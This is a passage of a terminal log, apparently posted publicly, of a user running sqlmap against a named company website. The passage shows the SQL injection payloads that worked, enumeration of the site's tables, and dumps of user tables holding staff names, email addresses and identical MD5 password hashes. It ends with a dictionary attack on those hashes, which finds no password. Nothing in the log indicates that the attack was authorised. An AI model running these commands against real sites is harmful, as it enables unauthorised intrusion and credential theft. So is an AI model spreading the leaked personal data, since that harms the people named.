  656. +---------+--------------+
  657. | usu_cod | int(11) |
  658. | usu_nom | varchar(45) |
  659. | usu_pwd | varchar(500) |
  660. | usu_tip | int(11) |
  661. +---------+--------------+
  662.  
  663. Database: artefarma_bdsqlartefarma
  664. Table: arquivos
  665. [4 columns]
  666. +---------+--------------+
  667. | Column | Type |
  668. +---------+--------------+
  669. | arquivo | varchar(200) |
  670. | id | int(11) |
  671. | nome | varchar(200) |
  672. | pasta | int(11) |
  673. +---------+--------------+
  674.  
  675. Database: artefarma_bdsqlartefarma
  676. Table: upload
  677. [5 columns]
  678. +---------+-------------+
  679. | Column | Type |
  680. +---------+-------------+
  681. | size | int(11) |
  682. | content | mediumblob |
  683. | id | int(11) |
  684. | name | varchar(45) |
  685. | type | varchar(45) |
  686. +---------+-------------+
  687.  
  688. Database: artefarma_bdsqlartefarma
  689. Table: paghome
  690. [5 columns]
  691. +--------------------+--------------+
  692. | Column | Type |
  693. +--------------------+--------------+
  694. | id | int(11) |
  695. | imgDestaque | varchar(100) |
  696. | janelaLinkDestaque | varchar(6) |
  697. | linkDestaque | varchar(300) |
  698. | textoDestaque | varchar(200) |
  699. +--------------------+--------------+
  700.  
  701. [00:09:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  702.  
  703. [*] shutting down at 00:09:43
  704.  
  705. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -C usu_cod,usu_nom,usu_pwd,usu_tip --tables
  706.  
  707. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  708. http://sqlmap.org
  709.  
  710. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  711.  
  712. [*] starting at 00:11:35
  713.  
  714. [00:11:35] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  715. Are you sure you want to continue? [y/N] y
  716. [00:11:37] [INFO] resuming back-end DBMS 'mysql'
  717. [00:11:37] [INFO] testing connection to the target URL
  718. [00:11:37] [INFO] heuristics detected web page charset 'ascii'
  719. [00:11:37] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  720. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  721. ---
  722. Place: GET
  723. Parameter: id
  724. Type: boolean-based blind
  725. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  726. Payload: id=-4224 OR (8424=8424)#
  727.  
  728. Type: error-based
  729. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  730. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  731.  
  732. Type: UNION query
  733. Title: MySQL UNION query (random number) - 4 columns
  734. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  735.  
  736. Type: AND/OR time-based blind
  737. Title: MySQL > 5.0.11 OR time-based blind
  738. Payload: id=-4593 OR 5414=SLEEP(5)
  739. ---
  740. [00:11:37] [INFO] the back-end DBMS is MySQL
  741. web server operating system: Windows 2008 R2 or 7
  742. web application technology: ASP.NET, Microsoft IIS 7.5
  743. back-end DBMS: MySQL 5.0
  744. [00:11:37] [INFO] fetching tables for database: 'artefarma_bdsqlartefarma'
  745. [00:11:37] [INFO] the SQL query used returns 25 entries
  746. Database: artefarma_bdsqlartefarma
  747. [25 tables]
  748. +--------------------------+
  749. | arquivos |
  750. | clientes |
  751. | contato |
  752. | faq |
  753. | galeriahome |
  754. | galeriainstitucional |
  755. | galeriaprodutos |
  756. | galeriaprojetosespeciais |
  757. | log_acesso |
  758. | loja |
  759. | loja_imagem |
  760. | n_emails |
  761. | noticias |
  762. | pagclientes |
  763. | pagcontato |
  764. | paghome |
  765. | paginstitucional |
  766. | pagorcamento |
  767. | pastas |
  768. | produto |
  769. | produtos |
  770. | projetosespeciais |
  771. | upload |
  772. | usuario |
  773. | usuarios |
  774. +--------------------------+
  775.  
  776. [00:11:37] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  777.  
  778. [*] shutting down at 00:11:37
  779.  
  780. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -C usu_cod,usu_nom,usu_pwd,usu_tip --tables
  781.  
  782. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  783. http://sqlmap.org
  784.  
  785. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  786.  
  787. [*] starting at 00:12:30
  788.  
  789. [00:12:30] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  790. Are you sure you want to continue? [y/N] y
  791. [00:12:32] [INFO] resuming back-end DBMS 'mysql'
  792. [00:12:37] [INFO] testing connection to the target URL
  793. [00:12:43] [INFO] heuristics detected web page charset 'ascii'
  794. [00:12:43] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  795. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  796. ---
  797. Place: GET
  798. Parameter: id
  799. Type: boolean-based blind
  800. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  801. Payload: id=-4224 OR (8424=8424)#
  802.  
  803. Type: error-based
  804. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  805. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  806.  
  807. Type: UNION query
  808. Title: MySQL UNION query (random number) - 4 columns
  809. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  810.  
  811. Type: AND/OR time-based blind
  812. Title: MySQL > 5.0.11 OR time-based blind
  813. Payload: id=-4593 OR 5414=SLEEP(5)
  814. ---
  815. [00:12:43] [INFO] the back-end DBMS is MySQL
  816. web server operating system: Windows 2008 R2 or 7
  817. web application technology: ASP.NET, Microsoft IIS 7.5
  818. back-end DBMS: MySQL 5.0
  819. [00:12:43] [INFO] fetching tables for database: 'artefarma_bdsqlartefarma'
  820. [00:12:43] [INFO] the SQL query used returns 25 entries
  821. Database: artefarma_bdsqlartefarma
  822. [25 tables]
  823. +--------------------------+
  824. | arquivos |
  825. | clientes |
  826. | contato |
  827. | faq |
  828. | galeriahome |
  829. | galeriainstitucional |
  830. | galeriaprodutos |
  831. | galeriaprojetosespeciais |
  832. | log_acesso |
  833. | loja |
  834. | loja_imagem |
  835. | n_emails |
  836. | noticias |
  837. | pagclientes |
  838. | pagcontato |
  839. | paghome |
  840. | paginstitucional |
  841. | pagorcamento |
  842. | pastas |
  843. | produto |
  844. | produtos |
  845. | projetosespeciais |
  846. | upload |
  847. | usuario |
  848. | usuarios |
  849. +--------------------------+
  850.  
  851. [00:12:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  852.  
  853. [*] shutting down at 00:12:43
  854.  
  855. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuario,usuarios --columns
  856.  
  857. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  858. http://sqlmap.org
  859.  
  860. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  861.  
  862. [*] starting at 00:14:41
  863.  
  864. [00:14:41] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  865. Are you sure you want to continue? [y/N] y
  866. [00:14:42] [INFO] resuming back-end DBMS 'mysql'
  867. [00:14:42] [INFO] testing connection to the target URL
  868. [00:14:43] [INFO] heuristics detected web page charset 'ascii'
  869. [00:14:43] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  870. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  871. ---
  872. Place: GET
  873. Parameter: id
  874. Type: boolean-based blind
  875. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  876. Payload: id=-4224 OR (8424=8424)#
  877.  
  878. Type: error-based
  879. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  880. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  881.  
  882. Type: UNION query
  883. Title: MySQL UNION query (random number) - 4 columns
  884. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  885.  
  886. Type: AND/OR time-based blind
  887. Title: MySQL > 5.0.11 OR time-based blind
  888. Payload: id=-4593 OR 5414=SLEEP(5)
  889. ---
  890. [00:14:43] [INFO] the back-end DBMS is MySQL
  891. web server operating system: Windows 2008 R2 or 7
  892. web application technology: ASP.NET, Microsoft IIS 7.5
  893. back-end DBMS: MySQL 5.0
  894. [00:14:43] [INFO] fetching columns for table 'usuario' in database 'artefarma_bdsqlartefarma'
  895. [00:14:43] [INFO] the SQL query used returns 4 entries
  896. [00:14:43] [INFO] resumed: "usu_cod","int(11)","usu_cod","int(11)","usu_cod","int(11)","usu_cod","int(11)"
  897. [00:14:43] [INFO] resumed: "usu_nom","varchar(45)","usu_nom","varchar(45)","usu_nom","varchar(45)","usu_nom","varchar(45)"
  898. [00:14:43] [INFO] resumed: "usu_pwd","varchar(500)","usu_pwd","varchar(500)","usu_pwd","varchar(500)","usu_pwd","varchar(500)"
  899. [00:14:43] [INFO] resumed: "usu_tip","int(11)","usu_tip","int(11)","usu_tip","int(11)","usu_tip","int(11)"
  900. [00:14:44] [INFO] fetching columns for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  901. [00:14:44] [INFO] the SQL query used returns 4 entries
  902. [00:14:44] [INFO] resumed: "id","int(11)","id","int(11)","id","int(11)","id","int(11)"
  903. [00:14:44] [INFO] resumed: "nome","varchar(200)","nome","varchar(200)","nome","varchar(200)","nome","varchar(200)"
  904. [00:14:44] [INFO] resumed: "login","varchar(100)","login","varchar(100)","login","varchar(100)","login","varchar(100)"
  905. [00:14:44] [INFO] resumed: "senha","varchar(300)","senha","varchar(300)","senha","varchar(300)","senha","varchar(300)"
  906. Database: artefarma_bdsqlartefarma
  907. Table: usuarios
  908. [4 columns]
  909. +--------+--------------+
  910. | Column | Type |
  911. +--------+--------------+
  912. | id | int(11) |
  913. | login | varchar(100) |
  914. | nome | varchar(200) |
  915. | senha | varchar(300) |
  916. +--------+--------------+
  917.  
  918. Database: artefarma_bdsqlartefarma
  919. Table: usuario
  920. [4 columns]
  921. +---------+--------------+
  922. | Column | Type |
  923. +---------+--------------+
  924. | usu_cod | int(11) |
  925. | usu_nom | varchar(45) |
  926. | usu_pwd | varchar(500) |
  927. | usu_tip | int(11) |
  928. +---------+--------------+
  929.  
  930. [00:14:44] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  931.  
  932. [*] shutting down at 00:14:44
  933.  
  934. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuario -C id,login,nome,senha --dump
  935.  
  936. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  937. http://sqlmap.org
  938.  
  939. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  940.  
  941. [*] starting at 00:15:14
  942.  
  943. [00:15:14] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  944. Are you sure you want to continue? [y/N] y
  945. [00:15:15] [INFO] resuming back-end DBMS 'mysql'
  946. [00:15:15] [INFO] testing connection to the target URL
  947. [00:15:15] [INFO] heuristics detected web page charset 'ascii'
  948. [00:15:16] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  949. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  950. ---
  951. Place: GET
  952. Parameter: id
  953. Type: boolean-based blind
  954. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  955. Payload: id=-4224 OR (8424=8424)#
  956.  
  957. Type: error-based
  958. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  959. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  960.  
  961. Type: UNION query
  962. Title: MySQL UNION query (random number) - 4 columns
  963. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  964.  
  965. Type: AND/OR time-based blind
  966. Title: MySQL > 5.0.11 OR time-based blind
  967. Payload: id=-4593 OR 5414=SLEEP(5)
  968. ---
  969. [00:15:16] [INFO] the back-end DBMS is MySQL
  970. web server operating system: Windows 2008 R2 or 7
  971. web application technology: ASP.NET, Microsoft IIS 7.5
  972. back-end DBMS: MySQL 5.0
  973. [00:15:16] [INFO] fetching columns 'id, login, nome, senha' for table 'usuario' in database 'artefarma_bdsqlartefarma'
  974. [00:15:16] [WARNING] reflective value(s) found and filtering out
  975. [00:15:16] [WARNING] unable to retrieve column names for table 'usuario' in database 'artefarma_bdsqlartefarma'
  976. [00:15:16] [INFO] fetching entries of column(s) 'id, login, nome, senha' for table 'usuario' in database 'artefarma_bdsqlartefarma'
  977. [00:15:16] [INFO] the SQL query used returns 3 entries
  978. [00:15:18] [INFO] the SQL query used returns 3 entries
  979. [00:15:20] [INFO] fetching number of column(s) 'id, login, nome, senha' entries for table 'usuario' in database 'artefarma_bdsqlartefarma'
  980. [00:15:20] [INFO] resumed: 3
  981. [00:15:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  982. [00:15:20] [INFO] retrieved: 477
  983. [00:15:33] [INFO] retrieved:
  984. [00:16:02] [INFO] retrieved:
  985. [00:16:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
  986. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
  987. !
  988. [00:16:19] [INFO] retrieved:
  989. [00:16:54] [INFO] retrieved:
  990. [00:16:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
  991. [00:16:56] [INFO] retrieved:
  992. [00:18:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
  993.  
  994. [00:18:49] [INFO] retrieved:
  995. [00:18:54] [INFO] retrieved: 477
  996. [00:19:34] [INFO] retrieved:
  997. [00:20:12] [INFO] retrieved:
  998. [00:20:13] [INFO] retrieved:
  999. [00:20:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
  1000.  
  1001. [00:21:08] [INFO] retrieved:
  1002. [00:21:10] [INFO] retrieved:
  1003. [00:21:40] [INFO] retrieved:
  1004. [00:21:47] [INFO] retrieved: 477
  1005. [00:22:49] [INFO] retrieved:
  1006. [00:24:02] [INFO] retrieved:
  1007. [00:24:05] [INFO] retrieved:
  1008. [00:25:24] [INFO] retrieved:
  1009. [00:25:28] [INFO] retrieved:
  1010. [00:26:54] [INFO] retrieved:
  1011. [00:26:57] [INFO] analyzing table dump for possible password hashes
  1012. Database: artefarma_bdsqlartefarma
  1013. Table: usuario
  1014. [3 entries]
  1015. +-----+---------+---------+---------+
  1016. | id | nome | login | senha |
  1017. +-----+---------+---------+---------+
  1018. | 477 | <blank> | !\x03 | <blank> |
  1019. | 477 | <blank> | <blank> | <blank> |
  1020. | 477 | <blank> | <blank> | <blank> |
  1021. +-----+---------+---------+---------+
  1022.  
  1023. [00:26:57] [INFO] table 'artefarma_bdsqlartefarma.usuario' dumped to CSV file '/usr/share/sqlmap/output/www.artefarma.com/dump/artefarma_bdsqlartefarma/usuario.csv'
  1024. [00:26:57] [WARNING] HTTP error codes detected during run:
  1025. 500 (Internal Server Error) - 31 times
  1026. [00:26:57] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  1027.  
  1028. [*] shutting down at 00:26:57
  1029.  
  1030. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuarios --columns
  1031.  
  1032. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  1033. http://sqlmap.org
  1034.  
  1035. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1036.  
  1037. [*] starting at 00:29:49
  1038.  
  1039. [00:29:49] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  1040. Are you sure you want to continue? [y/N] y
  1041. [00:29:50] [INFO] resuming back-end DBMS 'mysql'
  1042. [00:29:50] [INFO] testing connection to the target URL
  1043. [00:29:53] [INFO] heuristics detected web page charset 'ascii'
  1044. [00:29:53] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  1045. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1046. ---
  1047. Place: GET
  1048. Parameter: id
  1049. Type: boolean-based blind
  1050. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  1051. Payload: id=-4224 OR (8424=8424)#
  1052.  
  1053. Type: error-based
  1054. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  1055. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  1056.  
  1057. Type: UNION query
  1058. Title: MySQL UNION query (random number) - 4 columns
  1059. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  1060.  
  1061. Type: AND/OR time-based blind
  1062. Title: MySQL > 5.0.11 OR time-based blind
  1063. Payload: id=-4593 OR 5414=SLEEP(5)
  1064. ---
  1065. [00:29:53] [INFO] the back-end DBMS is MySQL
  1066. web server operating system: Windows 2008 R2 or 7
  1067. web application technology: ASP.NET, Microsoft IIS 7.5
  1068. back-end DBMS: MySQL 5.0
  1069. [00:29:53] [INFO] fetching columns for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  1070. [00:29:53] [INFO] the SQL query used returns 4 entries
  1071. [00:29:53] [INFO] resumed: "id","int(11)","id","int(11)","id","int(11)","id","int(11)"
  1072. [00:29:53] [INFO] resumed: "nome","varchar(200)","nome","varchar(200)","nome","varchar(200)","nome","varchar(200)"
  1073. [00:29:53] [INFO] resumed: "login","varchar(100)","login","varchar(100)","login","varchar(100)","login","varchar(100)"
  1074. [00:29:53] [INFO] resumed: "senha","varchar(300)","senha","varchar(300)","senha","varchar(300)","senha","varchar(300)"
  1075. Database: artefarma_bdsqlartefarma
  1076. Table: usuarios
  1077. [4 columns]
  1078. +--------+--------------+
  1079. | Column | Type |
  1080. +--------+--------------+
  1081. | id | int(11) |
  1082. | login | varchar(100) |
  1083. | nome | varchar(200) |
  1084. | senha | varchar(300) |
  1085. +--------+--------------+
  1086.  
  1087. [00:29:53] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  1088.  
  1089. [*] shutting down at 00:29:53
  1090.  
  1091. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuarios -C id,login,nome,senha --dump
  1092.  
  1093. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  1094. http://sqlmap.org
  1095.  
  1096. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1097.  
  1098. [*] starting at 00:30:19
  1099.  
  1100. [00:30:19] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  1101. Are you sure you want to continue? [y/N] y
  1102. [00:30:20] [INFO] resuming back-end DBMS 'mysql'
  1103. [00:30:24] [INFO] testing connection to the target URL
  1104. [00:30:25] [INFO] heuristics detected web page charset 'ascii'
  1105. [00:30:25] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  1106. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1107. ---
  1108. Place: GET
  1109. Parameter: id
  1110. Type: boolean-based blind
  1111. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  1112. Payload: id=-4224 OR (8424=8424)#
  1113.  
  1114. Type: error-based
  1115. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  1116. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  1117.  
  1118. Type: UNION query
  1119. Title: MySQL UNION query (random number) - 4 columns
  1120. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  1121.  
  1122. Type: AND/OR time-based blind
  1123. Title: MySQL > 5.0.11 OR time-based blind
  1124. Payload: id=-4593 OR 5414=SLEEP(5)
  1125. ---
  1126. [00:30:25] [INFO] the back-end DBMS is MySQL
  1127. web server operating system: Windows 2008 R2 or 7
  1128. web application technology: ASP.NET, Microsoft IIS 7.5
  1129. back-end DBMS: MySQL 5.0
  1130. [00:30:25] [INFO] fetching columns 'id, login, nome, senha' for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  1131. [00:30:27] [WARNING] reflective value(s) found and filtering out
  1132. [00:30:27] [INFO] the SQL query used returns 4 entries
  1133. [00:30:34] [INFO] retrieved: "id","int(11)"
  1134. [00:30:35] [INFO] retrieved: "nome","varchar(200)"
  1135. [00:30:36] [INFO] retrieved: "login","varchar(100)"
  1136. [00:30:37] [INFO] retrieved: "senha","varchar(300)"
  1137. [00:30:37] [INFO] fetching entries of column(s) 'id, login, nome, senha' for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  1138. [00:30:38] [INFO] the SQL query used returns 3 entries
  1139. [00:30:39] [INFO] retrieved: "7","jeffe@artefarma.com","jefferson","5cd3f50a183e55a6ac34d18601a70c05"
  1140. [00:30:40] [INFO] retrieved: "8","fabiene@artefarma.com","Fabiene","5cd3f50a183e55a6ac34d18601a70c05"
  1141. [00:30:40] [INFO] retrieved: "9","solange@activadigital.com.br","solange","5cd3f50a183e55a6ac34d18601a70c05"
  1142. [00:30:41] [INFO] analyzing table dump for possible password hashes
  1143. [00:30:41] [INFO] recognized possible password hashes in column 'senha'
  1144. do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
  1145. [00:30:47] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-U9JueC.txt'
  1146. do you want to crack them via a dictionary-based attack? [Y/n/q] Y
  1147. [00:30:49] [INFO] using hash method 'md5_generic_passwd'
  1148. what dictionary do you want to use?
  1149. [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
  1150. [2] custom dictionary file
  1151. [3] file with list of dictionary files
  1152. >
  1153. [00:30:52] [INFO] using default dictionary
  1154. do you want to use common password suffixes? (slow!) [y/N] y
  1155. [00:30:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
  1156. [00:30:53] [INFO] starting 4 processes
  1157. [00:44:52] [INFO] using suffix '1'
  1158. [00:45:00] [INFO] using suffix '123'
  1159. [00:45:08] [INFO] using suffix '2'
  1160. [00:45:16] [INFO] using suffix '12'
  1161. [00:45:23] [INFO] using suffix '3'
  1162. [00:45:31] [INFO] using suffix '13'
  1163. [00:45:38] [INFO] using suffix '7'
  1164. [00:45:46] [INFO] using suffix '11'
  1165. [00:45:53] [INFO] using suffix '5'
  1166. [00:46:17] [INFO] using suffix '22'
  1167. [00:46:24] [INFO] using suffix '23'
  1168. [00:46:31] [INFO] using suffix '01'
  1169. [00:46:39] [INFO] using suffix '4'
  1170. [00:46:46] [INFO] using suffix '07'
  1171. [00:47:09] [INFO] using suffix '21'
  1172. [00:47:16] [INFO] using suffix '14'
  1173. [00:47:23] [INFO] using suffix '10'
  1174. [00:47:30] [INFO] using suffix '06'
  1175. [00:47:37] [INFO] using suffix '08'
  1176. [00:47:45] [INFO] using suffix '8'
  1177. [00:47:52] [INFO] using suffix '15'
  1178. [00:47:59] [INFO] using suffix '69'
  1179. [00:48:06] [INFO] using suffix '16'
  1180. [00:48:13] [INFO] using suffix '6'
  1181. [00:48:21] [INFO] using suffix '18'
  1182. [00:48:29] [INFO] using suffix '!'
  1183. [00:48:37] [INFO] using suffix '.'
  1184. [00:48:45] [INFO] using suffix '*'
  1185. [00:48:52] [INFO] using suffix '!!'
  1186. [00:48:59] [INFO] using suffix '?'
  1187. [00:49:07] [INFO] using suffix ';'
  1188. [00:49:14] [INFO] using suffix '..'
  1189. [00:49:21] [INFO] using suffix '!!!'
  1190. [00:49:28] [INFO] using suffix ', '
  1191. [00:49:35] [INFO] using suffix '@'
  1192. [00:49:43] [WARNING] no clear password(s) found
  1193. [00:49:43] [INFO] postprocessing table dump
  1194. Database: artefarma_bdsqlartefarma
  1195. Table: usuarios
  1196. [3 entries]
  1197. +----+-----------+------------------------------+----------------------------------+
  1198. | id | nome | login | senha |
  1199. +----+-----------+------------------------------+----------------------------------+
  1200. | 7 | jefferson | jeffe@artefarma.com | 5cd3f50a183e55a6ac34d18601a70c05 |
  1201. | 8 | Fabiene | fabiene@artefarma.com | 5cd3f50a183e55a6ac34d18601a70c05 |
  1202. | 9 | solange | solange@activadigital.com.br | 5cd3f50a183e55a6ac34d18601a70c05 |
  1203. +----+-----------+------------------------------+----------------------------------+
  1204.  
  1205. [00:49:43] [INFO] table 'artefarma_bdsqlartefarma.usuarios' dumped to CSV file '/usr/share/sqlmap/output/www.artefarma.com/dump/artefarma_bdsqlartefarma/usuarios.csv'
  1206. [00:49:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  1207.  
  1208. [*] shutting down at 00:49:43